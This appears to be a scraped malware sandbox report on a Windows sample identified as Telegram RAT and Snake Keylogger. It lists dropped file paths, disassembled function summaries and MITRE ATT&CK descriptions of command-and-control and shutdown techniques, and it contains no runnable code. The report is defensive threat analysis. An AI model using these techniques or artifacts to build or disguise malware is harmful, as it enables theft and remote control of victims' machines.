Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ugpJX5h56S.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgude254.dap.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5pduyxv.rdl.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ri1consq.pmf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xziqauov.5ne.psm1

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Atomspaltningens.Cyr

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Neonlysskilt.txt

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Teet173.net

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\udplacder.keg

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe

C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet\ugpJX5h56S.exe:Zone.Identifier

Windows Analysis Report
ugpJX5h56S.exe

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C4D Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00406C5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403FC1 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403C13 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030A2 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Function 0040657E Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 204
stringCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre